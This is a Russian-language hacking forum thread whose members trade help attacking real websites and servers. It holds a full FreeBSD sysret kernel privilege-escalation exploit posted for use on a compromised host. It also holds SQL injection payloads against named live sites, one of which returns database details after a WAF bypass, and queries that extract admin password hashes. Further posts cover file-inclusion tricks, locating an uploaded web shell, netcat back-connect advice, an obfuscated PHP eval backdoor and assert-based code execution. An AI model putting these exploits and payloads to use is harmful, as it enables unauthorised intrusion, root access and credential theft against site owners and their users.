Нашёл exploit под freebsd 8.3 .

Инфа в shell такая : FreeBSD ****** 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Mon Jun 30 13:33:36 UTC 2014

Взято с github'a:


.SpoilerTarget" type="button">Spoiler
// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)

// Copyright 2012 all right reserved, not for commercial uses, bitches

// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.

#include

#include

#include

#include

#include

#include

#include

#include

#define _WANT_UCRED

#include

#include

#include

#include

uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;

struct gate_descriptor * sidt()

{

struct region_descriptor idt;

asm ("sidt %0": "=m"(idt));

return (struct gate_descriptor*)idt.rd_base;

}

u_long get_symaddr(char *symname)

{

struct kld_sym_lookup ksym;

ksym.version = sizeof (ksym);

ksym.symname = symname;

if (kldsym(0, KLDSYM_LOOKUP, &ksym) gd_looffset = func;

ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);

ip->gd_ist = ist;

ip->gd_xx = 0;

ip->gd_type = typ;

ip->gd_dpl = dpl;

ip->gd_p = 1;

ip->gd_hioffset = func>>16;

}

void shellcode()

{

// Actually we dont really need to spawn a shell since we

// changed our whole cred struct.

// Just exit...

printf(" Got root!\n");

exit(0);

}

void kernelmodepayload()

{

struct thread *td;

struct ucred *cred;

// We need to restore/recover whatever we smashed

// We inititalized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())

// The #GP exception frame writes 6*64bit registers, i.e. it overwrites

// idt[18], idt[17] and idt[16]

// thus overall we have:

// - idt[18], idt[17] and idt[16] are trashed

// - tf_addr -> overwrites the 64bit-LSB of idt[15]

// - tf_trapno -> overwrites Target Offset[63:32] of idt[14]

// - rdi -> overwrites the 64bit-LSB of idt[7]

// - #PF exception frame overwrites idt[6], idt[5] and idt[4]

struct gate_descriptor *idt = sidt();

setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4

setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5

setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6

setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7

setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14

setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15

setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16

setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17

setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18

// get the thread pointer

asm ("mov %%gs:0, %0" : "=r"(td));

// The Dark Knight Rises

cred = td->td_proc->p_ucred;

cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;

cred->cr_groups[0] = 0;

// return to user mode to spawn the shell

asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx

}

#define TRIGGERCODESIZE 20

#define TRAMPOLINECODESIZE 18

void trigger()

{

printf(" Setup...\n");

// Allocate one page just before the non-canonical address

printf(" [+] Trigger code...\n");

uint64_t pagesize = getpagesize();

uint8_t * area = (uint8_t*)((1ULL \n");

// Prepare the values we'll need to restore the kernel to a stable state

printf(" Resolving kernel addresses...\n");

Xofl_ptr = (uintptr_t)get_symaddr("Xofl");

Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");

Xill_ptr = (uintptr_t)get_symaddr("Xill");

Xdna_ptr = (uintptr_t)get_symaddr("Xdna");

Xpage_ptr = (uintptr_t)get_symaddr("Xpage");

Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");

Xalign_ptr = (uintptr_t)get_symaddr("Xalign");

Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");

Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");

// doeet!

trigger();

return 0;

}


Подойдёт?

И ещё пишу в netcat следующее : nc ip port он 1 сек держится и закрывается,запускал через nc64.exe . В чём проблема?[/I][/I][/I][/I]

сначала приконектись к серверу норм, поизучай комманды нетката, лучше забинди порт на сервере а еще лучше бэкконнект у себя запусти неткат с прослушкой нужного порта

Не могу обрезать php да и вообще докопаться до /etc/passwd# + sys_ привязывается.

ошибка :


Code:
Warning: include(sys_config\0.php) [function.include]: failed to open stream: No such file or directory in /home/*****/****.*****.***/docs/index.php on line 26

Warning: include() [function.include]: Failed opening 'sys_config\0.php' for inclusion (include_path='.:/home/*****/***.******.***/php') in /home/****/***.******.***/docs/index.php on line 26

в параметр вписывал это : config.php%00

Deprecated: Function ereg() is deprecated in /lib/dbcontroller/DbLog.class.php on line 41
LFI?

SaNDER said:
↑ (https://antichat.live/posts/4051972/)
Не могу обрезать php да и вообще докопаться до /etc/passwd# + sys_ привязывается.

ошибка :


Code:
Warning: include(sys_config\0.php) [function.include]: failed to open stream: No such file or directory in /home/*****/****.*****.***/docs/index.php on line 26

Warning: include() [function.include]: Failed opening 'sys_config\0.php' for inclusion (include_path='.:/home/*****/***.******.***/php') in /home/****/***.******.***/docs/index.php on line 26

в параметр вписывал это : config.php%00


версия пхп? нулль байт не сработает

Gorev said:
↑ (https://antichat.live/posts/4051998/)
версия пхп? нулль байт не сработает


имхо 5.2.10

ну в 5 версии не сработает

Альтернативу нуллбайту из /////[...]///// пофиксили в 5.3.3, сам нуллбайт в 5.3.4.


SaNDER said:
↑ (https://antichat.live/posts/4051972/)
Warning: include(sys_config\0.php)


magic_quotes_gpc = On

Пробуй вытеснение слешами.

brown said:
↑ (https://antichat.live/posts/4051997/)
Deprecated: Function ereg() is deprecated in /lib/dbcontroller/DbLog.class.php on line 41
LFI?


Нет, это напоминание об использовании устаревшей функции. Регулярки ereg/eregi и нескольких других функций можно обойти при помощи нуллбайта.

Играюсь на локалхосте с session fixation

Передаю скрипту которыи логинет

http://localhost/admin/controler.ph...hecp6580&login=admin&password=123456&login-in (http://localhost/admin/controler.php?PHPSESSID=dfemet943uoieudhvqhecp6580&login=admin&password=123456&login-in)

Но на втором браузере никак не пропускает в админку

Что я делаю нетак ?


Code:
/* LOGIN SESSION SET */
else if(isset($_GET['login-in'])){
$admin = "SELECT COUNT(*) FROM admin WHERE login=:login AND password=:password ";
$s = $pdo->prepare($admin);
$s->bindValue(':login',$_GET['login']);
$s->bindValue(':password',$_GET['password']);
$s->execute();
$n = $s->fetchColumn();
if ($n > 0){
$admin = "SELECT login FROM admin WHERE login=:login AND password=:password ";
$s = $pdo->prepare($admin);
$s->bindValue(':login',$_GET['login']);
$s->bindValue(':password',$_GET['password']);
$s->execute();
session_start();
foreach ($s as $value){
$_SESSION['admin'] = $value['login'];
}
header('Location:news.php');
exit();
}

crlf said:
↑ (https://antichat.live/posts/4052039/)
Альтернативу нуллбайту из /////[...]///// пофиксили в 5.3.3, сам нуллбайт в 5.3.4.
magic_quotes_gpc = On
Пробуй вытеснение слешами.


Это как?Дайте статью,если не сложно .

SaNDER said:
↑ (https://antichat.live/posts/4053452/)
Это как?Дайте статью,если не сложно .


/threads/424557/page-90#post-4050639 (https://antichat.live/threads/424557/page-90/)

/threads/424557/page-90#post-4050648 (https://antichat.live/threads/424557/page-90/)

Помогите раскрутить

biggreenbookshop.com/index.php?searchStr=1'&_a=viewCat (http://www.biggreenbookshop.com/index.php?searchStr=1'&_a=viewCat)

WallHack said:
↑ (https://antichat.live/posts/4055697/)
Помогите раскрутить
biggreenbookshop.com/index.php?searchStr=1'&_a=viewCat (http://www.biggreenbookshop.com/index.php?searchStr=1'&_a=viewCat)


This error was generated by Mod_Security.

Помогите найти путь до Shell пожалуйста, залил шелл через картинку, а путь найти не могу

negativmans said:
↑ (https://antichat.live/posts/4056124/)
Помогите найти путь до Shell пожалуйста, залил шелл через картинку, а путь найти не могу


в исходнике посмотреть путь до картинки, через какую аплоадилку заливали?возможно есть стандартный путь заливки, залей картинку и посмотри (если возможно )куда она льется...

В .htaccess стоит Options All -Indexes но папка со всеми файлами почему-то открыта для просмотра из вне и тем самым сильно портит жизнь, в чем может быть проблема? Модуль какой в апаче, или еще что... Надо ее в общем закрыть как-то

Что за уязвимость SOME? В интернете полное название :

Upload Same Origin Method Execution .

и просил перейти на

wp-includes/js/plupload/plupload.flash.swf

после скачивался файл в формате swf . В чём суть?

Есть доступ к debug.log в WP .

Ошибки такого формата :


Code:
[01-Feb-2017 21:44:34 UTC] PHP Warning: include(/home/****/public_html/wp-content/advanced-cache.php): failed to open stream: No such file or directory in /home/****/public_html/wp-settings.php on line 74

Только толку ?

SaNDER said:
↑ (https://antichat.live/posts/4057341/)
Что за уязвимость SOME?
Только толку ?


Вот здесь есть PoC:

http://ropchain.org/poc/wordpress/

Суть в том, что plupload позволяет выполнять действия от имени админа, если выполнено несколько условий.

Ereee said:
↑ (https://antichat.live/posts/4057570/)
Вот здесь есть PoC:
http://ropchain.org/poc/wordpress/
Суть в том, что plupload позволяет выполнять действия от имени админа, если выполнено несколько условий.


Мне нужно статью или что-то в этом духе,ибо у меня есть сайт и у меня качается этот файл swf,но что дальше делать и какие условия нужны не знаю .

SaNDER said:
↑ (https://antichat.live/posts/4057597/)
Мне нужно статью или что-то в этом духе,ибо у меня есть сайт и у меня качается этот файл swf,но что дальше делать и какие условия нужны не знаю .


plupload Same Origin Method Execution (http://zoczus.blogspot.ru/2015/04/plupload-same-origin-method-execution.html)

И для лучшего понимания видео презентации с BHE 2014

Посмотрите и подскажите что ни будь пожалуйста:

http://www.oyandasozi.tj/index.php/...канчоч-талко-ба-шарикон-ниёз-дорад?start=1420 (http://www.oyandasozi.tj/index.php/tj/aks-o/item/57-%D0%B1%D0%B0%D1%80%D0%BE%D0%B8-%D0%BA%D0%BE%D1%80%D0%BA%D0%B0%D1%80%D0%B4%D0%B8-%D0%BA%D0%BE%D0%BD%D2%B3%D0%BE%D0%B8-%D0%BA%D0%B0%D0%BD%D1%87%D0%BE%D1%87-%D1%82%D0%B0%D0%BB%D0%BA%D0%BE-%D0%B1%D0%B0-%D1%88%D0%B0%D1%80%D0%B8%D0%BA%D0%BE%D0%BD-%D0%BD%D0%B8%D1%91%D0%B7-%D0%B4%D0%BE%D1%80%D0%B0%D0%B4/57-%D0%B1%D0%B0%D1%80%D0%BE%D0%B8-%D0%BA%D0%BE%D1%80%D0%BA%D0%B0%D1%80%D0%B4%D0%B8-%D0%BA%D0%BE%D0%BD%D2%B3%D0%BE%D0%B8-%D0%BA%D0%B0%D0%BD%D1%87%D0%BE%D1%87-%D1%82%D0%B0%D0%BB%D0%BA%D0%BE-%D0%B1%D0%B0-%D1%88%D0%B0%D1%80%D0%B8%D0%BA%D0%BE%D0%BD-%D0%BD%D0%B8%D1%91%D0%B7-%D0%B4%D0%BE%D1%80%D0%B0%D0%B4?start=1420)

PHP:
getExtension() == 'php') {
header('Content-type:application/x-httpd-php');
}
echo file_get_contents($_GET['file']);
} else {
echo 'ACCESS DENIED!';
}

есть такой код,очевидно лфи ,но только для файлов lib.php, main.js,email_template.html,data.json , как можно обойти ,чтобы можно было читать другие файлы на сервере?

Переопределить массив files если register_globals=on ?

register_globals=off

swat_ said:
↑ (https://antichat.live/posts/4058126/)
очевидно лфи


Читалка или RFD, по OWASP Path Traversal.


swat_ said:
↑ (https://antichat.live/posts/4058126/)
как можно обойти


Никак.


billybonse said:
↑ (https://antichat.live/posts/4058149/)
Переопределить массив files если register_globals=on ?


Если бы $files не был объявлен или было так $files[].

Опасна ли данная функция ?


Code:
$url = preg_replace('/\s+/', '', $_POST['url']);

WallHack said:
↑ (https://antichat.live/posts/4058392/)
Опасна ли данная функция ?

Code:
$url = preg_replace('/\s+/', '', $_POST['url']);



Сама функция без модификатора /e не опасна. У Вас всего лишь вырезаются пробелы из переменной $_POST['url'] в которой (по задумке) должен передаваться адрес сайта. Что происходит дальше с переменной и какие манипуляции с ней происходят не известно, может там и есть уязвимость.

Можно залится?

http://www.infomarket.md/fckeditor/editor/filemanager/connectors/uploadtest.html

Code:
DUPLICATOR INSTALL-LOG
STEP1 START @ **:**:**
NOTICE: Do NOT post to public sites or forums
************************************************** ******************************
VERSION: 1.1.16
PHP: 5.5.30 | SAPI: apache2handler
SERVER: Apache
DOC ROOT: /home/*******/public_html
DOC ROOT 755: false
LOG FILE 644: true
BUILD NAME: 20160829_*******_57c4a0b1280555134160829205305
REQUEST URL: http://www.*******/installer.php

************************************************** ******************************
ARCHIVE SETUP
************************************************** ******************************
NAME: 20160829_******_57c4a0b1280555134160829205305_arch ive.zip

Нужно получить доступ к 20160829_******_57c4a0b1280555134160829205305_arch ive.zip .

На других сайтах работает так site.domain/20160829_******_57c4a0b1280555134160829205305_arch ive.zip

Но тут такое не прокатывает,выдаёт 404 . Мб значит где-то в другом месте или его вообще нет ????

Желательно это,но,если у вас есть какие-нибудь сплоиты скиньте на wp 4.6.1(я сам искал не нашёл)

Скачать могу,а директорию к zip'у не знаю. Help .

При восстановлении пароля на одном сайте на почте приходит УРЛ в которыи содежится


Code:
8dc8ebada0934e534bfce7245a629086c1579777-9880d7ecf0984172a2e4c3689b3291ff-1489250150



Code:
c904e33cfe3b3a26705f887326039fd0aa5bf498-9880d7ecf0984172a2e4c3689b3291ff-1489249791

sha1(Предполагаю что sha)+md5(Не меняется никогда)+time(Можно предугадать)

Выходит что нужно предугадать первый хэш

Я недавно находил подобную уязвимость ,есть методы проверки на подобные недочеты?

Кто что знает кто что встречял на практике?

Материал может скиньте а то кроме

https://raz0r.name/articles/predskazyvaem-sluchajnye-chisla-v-php/

Ничего

Если там не брутабельное значение и исключены простейшие варианты, то как минимум нужны исходники, а так же должна сойтись куча звёзд. Для общего ознакомления можно почитать:

https://ru.wikipedia.org/wiki/Атака_на_ГПСЧ

https://ru.wikipedia.org/wiki/Атака_удлинением_сообщения

https://ru.wikipedia.org/wiki/Коллизия_хеш-функции

Интересный случай атаки на ГПСЧ:

https://geektimes.ru/post/285568/

Как укоротить такои SQL


Code:
/*'%2b(select(0)from(select(sleep(5)))v)%2b'*/

Что делает этот кусок не понимаю какои вектор атаке тут?

Octavian said:
↑ (https://antichat.live/posts/4059463/)
Как укоротить такои SQL

Code:
/*'%2b(select(0)from(select(sleep(5)))v)%2b'*/

Что делает этот кусок не понимаю какои вектор атаке тут?


Это проверка уязвимости сайта. Это один из самых простых и безопасных способов, чтобы выяснить, если ваш сервер является уязвимым для SQL инъекций - и что еще более важно, она не нуждается в каких-либо внимания со стороны потенциального взломщика! Обычно скриптом тестят, автоматически тестируют сайты на наличие уязвимостей SQL инъекции - если результат положительный. то в принципе дальше есть смысл раскручивать.

Идея заключается в том, что уязвимый сервер будет по-разному реагировать на запрос с разными значениями аргумента sleep - это значит, что очень легко можно будет автоматически пройти через все возможные входы (не забывай, что даже такие вещи, как скрытые поля и выпадающие может быть изменены по желанию) и выяснить, если любой из них являются уязвимыми. Когда это работает, ты можешь произвести инъекцию непосредственно соответствующим запросом.ИМХО

Gorev said:
↑ (https://antichat.live/posts/4059475/)
Это проверка уязвимости сайта. Это один из самых простых и безопасных способов, чтобы выяснить, если ваш сервер является уязвимым для SQL инъекций - и что еще более важно, она не нуждается в каких-либо внимания со стороны потенциального взломщика! Обычно скриптом тестят, автоматически тестируют сайты на наличие уязвимостей SQL инъекции - если результат положительный. то в принципе дальше есть смысл раскручивать.
Идея заключается в том, что уязвимый сервер будет по-разному реагировать на запрос с разными значениями аргумента sleep - это значит, что очень легко можно будет автоматически пройти через все возможные входы (не забывай, что даже такие вещи, как скрытые поля и выпадающие может быть изменены по желанию) и выяснить, если любой из них являются уязвимыми. Когда это работает, ты можешь произвести инъекцию непосредственно соответствующим запросом.ИМХО


Я это знаю мне нужно понять что сделает данный запрос, потому что простои запрос выглядел бы так 'or sleep(5)#

И как довесть мои запрос до этого sleep(5) ?

Синтактически что он делает а то что он говорит серверу спать на 5 секунд ясно

Кто знает есть что то под OpenSSH 4.3 (protocol 2.0)?

Почему даже в сесии советуют шифровать значения в md5() в каких условиях может помоч?

Octavian said:
↑ (https://antichat.live/posts/4061241/)
Почему даже в сесии советуют шифровать значения в md5() в каких условиях может помоч?




Code:
https://habrahabr.ru/post/120636/

Gorev said:
↑ (https://antichat.live/posts/4061268/)

Code:
https://habrahabr.ru/post/120636/



Нет там ответа пишет что не безопасно хранить в plain-text пароль в сесии а почему не пишет

Octavian said:
↑ (https://antichat.live/posts/4061387/)
Нет там ответа пишет что не безопасно хранить в plain-text пароль в сесии а почему не пишет


Один из... как вариантов... встречались такие сайты, где сессии хранятся ввиде файлов, т.е при расшариных директориях(кривых настройках сервака), я мог прочесть сессию где хранился пасс или хэшь пасса, второй момент, опять же из-за кривизны настроек, встречал серваки хранящие сессии в /tmp, где также при чтении сессии можно было выявить пасс.

winstrool said:
↑ (https://antichat.live/posts/4061406/)
Один из... как вариантов... встречались такие сайты, где сессии хранятся ввиде файлов, т.е при расшариных директориях(кривых настройках сервака), я мог прочесть сессию где хранился пасс или хэшь пасса, второй момент, опять же из-за кривизны настроек, встречал серваки хранящие сессии в /tmp, где также при чтении сессии можно было выявить пасс.


xampp тоже в tmp сохраняет сессии это неправильно?

Octavian said:
↑ (https://antichat.live/posts/4061411/)
xampp тоже в tmp сохраняет сессии это неправильно?


Куда сохраняется сессия, устанавливается директивой в пхп.ини "session.save_path" по умолчанию она всегда будет сохранять в /tmp, я бы лучше рекомендовал устанавливать в пользовательский каталог сайта, для скрытия названия сессии и при кривезны настроек, содержимого, бывает такое, что достаточно в куках вставить корректно название сессии и мы уже можем быть тем, кому она принадлежала на соответствующем сайте.

Привет ребят.Есть компьютер в организации который подключён к серверу, могу ли я с помощью него узнать внешний ip сервера ?

И могу ли?

Заранее спасибо

sql инъекциями заинтересовался совсем недавно, так что не судите строго...)) не нашел куда написать, поэтому пишу сюда ))есть пара любопытных моментов

раскрутил уязвимость вручную и мапом... в обеих случаях название бд и таблиц, как и пароля админа -разные.. с чем это может быть связано?

и еще.. подскажите, что это за метод? есть где можно узнать о нем поподробдней?

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

Golfstream said:
↑ (https://antichat.live/posts/4062316/)
sql инъекциями заинтересовался совсем недавно, так что не судите строго...)) не нашел куда написать, поэтому пишу сюда ))есть пара любопытных моментов
раскрутил уязвимость вручную и мапом... в обеих случаях название бд и таблиц, как и пароля админа -разные.. с чем это может быть связано?
и еще.. подскажите, что это за метод? есть где можно узнать о нем поподробдней?
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/



раскрутил уязвимость вручную и мапом... в обеих случаях название бд и таблиц, как и пароля админа -разные.. с чем это может быть связано? Когда вы раскручивайте в ручную данные сливаются из другой БД, возможен такой вариант.

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ - инъекция по времени. Так любит сканнер проверять. Узнать можно на форуме АнтиЧат например,или в гугле.

BabaDook said:
↑ (https://antichat.live/posts/4062330/)
раскрутил уязвимость вручную и мапом... в обеих случаях название бд и таблиц, как и пароля админа -разные.. с чем это может быть связано? Когда вы раскручивайте в ручную данные сливаются из другой БД, возможен такой вариант.
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ - инъекция по времени. Так любит сканнер проверять. Узнать можно на форуме АнтиЧат например,или в гугле.


Очень много фаззеров фолсе позитивят именно на time-based. А вот w3af молодец. Он умеет понимать блинды.

http://xxx.ru/?r=club/catalog/detail&id=-53 order by extractvalue(0x0a,concat(0x0a,(select concat_ws(0x3b,password) from b_user limit 1,1))) -- - (http://xxx.ru/?r=club/catalog/detail&id=-53%20order%20by%20extractvalue(0x0a,concat(0x0a,(s elect%20concat_ws(0x3b,password)%20from%20b_user%2 0limit%201,1)))%20--%20-)

выводит не полный хэш, как составить запрос чтобы выводил все символы их хэша?

elvir said:
↑ (https://antichat.live/posts/4062633/)
http://xxx.ru/?r=club/catalog/detail&id=-53 order by extractvalue(0x0a,concat(0x0a,(select concat_ws(0x3b,password) from b_user limit 1,1))) -- - (http://xxx.ru/?r=club/catalog/detail&id=-53%20order%20by%20extractvalue(0x0a,concat(0x0a,(s elect%20concat_ws(0x3b,password)%20from%20b_user%2 0limit%201,1)))%20--%20-)
выводит не полный хэш, как составить запрос чтобы выводил все символы их хэша?


mid

http://xxx.ru/?r=club/catalog/detai...0x3b,password) from b_user limit 1,1))) -- -# (http://xxx.ru/?r=club/catalog/detail&id=-53%20order%20by%20extractvalue(0x0a,concat(0x0a,(s elect%20concat_ws(0x3b,password)%20from%20b_user%2 0limit%201,1)))%20--%20-)


Gorev said:
↑ (https://antichat.live/posts/4062658/)
mid


а как узнать название баз данных на сервере? Не таблиц а баз.

elvir said:
↑ (https://antichat.live/posts/4062677/)
http://xxx.ru/?r=club/catalog/detail&id=-53 order by extractvalue(0x0a,concat(0x0a,(select concat_ws(0x3b,password) from b_user limit 1,1))) -- -# (http://xxx.ru/?r=club/catalog/detail&id=-53%20order%20by%20extractvalue(0x0a,concat(0x0a,(s elect%20concat_ws(0x3b,password)%20from%20b_user%2 0limit%201,1)))%20--%20-)
а как узнать название баз данных на сервере? Не таблиц а баз.


SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0

или

SELECT distinct(db) FROM mysql.db

последний при определённых условиях срабатывает

Что будет если отправить 2 одинаковых http запроса одновременно например при восстановление пароля есть шансы что придет одинаковый код восстановления? Как отправить 2 запроса с минимальной задержки ? Какие похожие баги есть кроме race condition найдено в старбак се?

Парни, подскажите пожалуйста, как на практике эксплуатировать данный баг:

https://github.com/lesterchan/wp-email/commit/bcae41780ef78ce4d0780fc417c0343d5715b18a

Octavian said:
↑ (https://antichat.live/posts/4062798/)
Что будет если отправить 2 одинаковых http запроса одновременно например при восстановление пароля есть шансы что придет одинаковый код восстановления? Как отправить 2 запроса с минимальной задержки ? Какие похожие баги есть кроме race condition найдено в старбак се?


думаю, что идея утопична. ибо каждый запрос генерирует уникальный хэндлер

PHP:
$tf4daa)
{
$q91f628=$tf4daa;
$t1fb=$j49bf;
}

if (!$q91f628)
{
foreach ($GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][27].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][64].$GLOBALS['s251'][17].$GLOBALS['s251'][17]] as$j49bf=>$tf4daa)
{
$q91f628=$tf4daa;
$t1fb=$j49bf;
}
}

$q91f628= @$GLOBALS[$GLOBALS['s251'][3].$GLOBALS['s251'][27].$GLOBALS['s251'][31].$GLOBALS['s251'][0]]($GLOBALS[$GLOBALS['s251'][26].$GLOBALS['s251'][0].$GLOBALS['s251'][84].$GLOBALS['s251'][17]]($GLOBALS[$GLOBALS['s251'][7].$GLOBALS['s251'][64].$GLOBALS['s251'][3].$GLOBALS['s251'][20].$GLOBALS['s251'][84].$GLOBALS['s251'][31].$GLOBALS['s251'][32].$GLOBALS['s251'][4]]($q91f628),$t1fb));
if (isset($q91f628[$GLOBALS['s251'][27].$GLOBALS['s251'][71]]) &&$re3c==$q91f628[$GLOBALS['s251'][27].$GLOBALS['s251'][71]])
{
if ($q91f628[$GLOBALS['s251'][27]] ==$GLOBALS['s251'][47])
{
$l220c9= Array(
$GLOBALS['s251'][16].$GLOBALS['s251'][55] => @$GLOBALS[$GLOBALS['s251'][88].$GLOBALS['s251'][64].$GLOBALS['s251'][7].$GLOBALS['s251'][3].$GLOBALS['s251'][31].$GLOBALS['s251'][13].$GLOBALS['s251'][84].$GLOBALS['s251'][32].$GLOBALS['s251'][13]](),
$GLOBALS['s251'][30].$GLOBALS['s251'][55] =>$GLOBALS['s251'][33].$GLOBALS['s251'][89].$GLOBALS['s251'][32].$GLOBALS['s251'][73].$GLOBALS['s251'][33],
);
echo @$GLOBALS[$GLOBALS['s251'][79].$GLOBALS['s251'][84].$GLOBALS['s251'][0].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12].$GLOBALS['s251'][64]]($l220c9);
}
elseif ($q91f628[$GLOBALS['s251'][27]] ==$GLOBALS['s251'][4])
{
eval($q91f628[$GLOBALS['s251'][7]]);
}
exit();
}

Что это?

Подскажите, есть ли в настоящее время смысл искать SQL-i в cookie/user-agent/referrer ?

MrScrudg said:
↑ (https://antichat.live/posts/4063530/)
Подскажите, есть ли в настоящее время смысл искать SQL-i в cookie/user-agent/referrer ?


в любое время есть смысл искать инъекции где угодно

MrScrudg said:
↑ (https://antichat.live/posts/4063530/)
Подскажите, есть ли в настоящее время смысл искать SQL-i в cookie/user-agent/referrer ?


А почему бы и нет?думаете что все поголовно решили все вопросы с фильтрацией ?

Code:
http://www.men-defencetec.de/en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b&tx_men_pi1%5Bdetail%5D=54+/*!12345anD*/+1=0+/*!911111*/union+/*!12345sELecT*/+'1','2','3','4','5','6','7','8','9','10','11','12 ','13','14','15','16','17','18','19','20','21','22 ','23','24','25','26','27','28','29','30','31','32 ','33','34','35','36','37','38','39','40','41','42 ','43','44','45','46','47','48','49','50','51','52 ','53','54','55','56','57','58','59','60','61','62 ','63','64','65',66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100,101,102,103,104,105,106,107 ,108,109,110,111,112,113,114,115,116,117,118,119,1 20,121,122,123,124,125,126,127,128,129,130,131,132 ,133,134,135,136,137,138,139,140,141,142,143,144,1 45,146,147,148,149,150,151,152,153,154,155,156,157 ,158,159,160,161,162,163,164,165,166,167,168,169,1 70,171,172,173,174,175,176,177,178,179,180+--+

Хелп, нужно вывод

DezMond™ said:
↑ (https://antichat.live/posts/4063572/)

Code:
http://www.men-defencetec.de/en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b&tx_men_pi1%5Bdetail%5D=54+/*!12345anD*/+1=0+/*!911111*/union+/*!12345sELecT*/+'1','2','3','4','5','6','7','8','9','10','11','12 ','13','14','15','16','17','18','19','20','21','22 ','23','24','25','26','27','28','29','30','31','32 ','33','34','35','36','37','38','39','40','41','42 ','43','44','45','46','47','48','49','50','51','52 ','53','54','55','56','57','58','59','60','61','62 ','63','64','65',66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100,101,102,103,104,105,106,107 ,108,109,110,111,112,113,114,115,116,117,118,119,1 20,121,122,123,124,125,126,127,128,129,130,131,132 ,133,134,135,136,137,138,139,140,141,142,143,144,1 45,146,147,148,149,150,151,152,153,154,155,156,157 ,158,159,160,161,162,163,164,165,166,167,168,169,1 70,171,172,173,174,175,176,177,178,179,180+--+

Хелп, нужно вывод


Злой ваф

может кто сможет обойти...

DezMond™ said:
↑ (https://antichat.live/posts/4063572/)

Code:
http://www.men-defencetec.de/en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b&tx_men_pi1%5Bdetail%5D=54+/*!12345anD*/+1=0+/*!911111*/union+/*!12345sELecT*/+'1','2','3','4','5','6','7','8','9','10','11','12 ','13','14','15','16','17','18','19','20','21','22 ','23','24','25','26','27','28','29','30','31','32 ','33','34','35','36','37','38','39','40','41','42 ','43','44','45','46','47','48','49','50','51','52 ','53','54','55','56','57','58','59','60','61','62 ','63','64','65',66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100,101,102,103,104,105,106,107 ,108,109,110,111,112,113,114,115,116,117,118,119,1 20,121,122,123,124,125,126,127,128,129,130,131,132 ,133,134,135,136,137,138,139,140,141,142,143,144,1 45,146,147,148,149,150,151,152,153,154,155,156,157 ,158,159,160,161,162,163,164,165,166,167,168,169,1 70,171,172,173,174,175,176,177,178,179,180+--+

Хелп, нужно вывод


Не стоит забывать, что иногда параметры можно передавать одинаково как через GET, так и через POST, в котором зачастую ничего не фильтруется!


Code:
POST /en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b HTTP/1.1
Host: www.men-defencetec.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

tx_men_pi1[detail]=(1)--~(select*from(select(concat_ws(0x3a,@@version,data base(),user()))n)f)#

Результат:


array(4 items)
caller => 'TYPO3\CMS\Core\Database\DatabaseConnection::sql_q uery' (53 chars)
ERROR => 'BIGINT value is out of range in '-(~((select '
5.6.27-log:mendefence1:mendefe

nce.1@www1.customers.omc.net (mailto:nce.1@www1.customers.omc.net)
' from dual)))'' (119 chars)

assert(stripslashes($_REQUEST['p']));

Подскажите кто-нибудь как через assert пролиться? Не пойму как он работает

eval($_REQUEST[x]);&x=phpcredits();

Gorev said:
↑ (https://antichat.live/posts/4045763/)
ну для ssh пассы в открытом виде еще со времен мамонтов не было, попробуй файлы конфигов фтп, апача




Code:
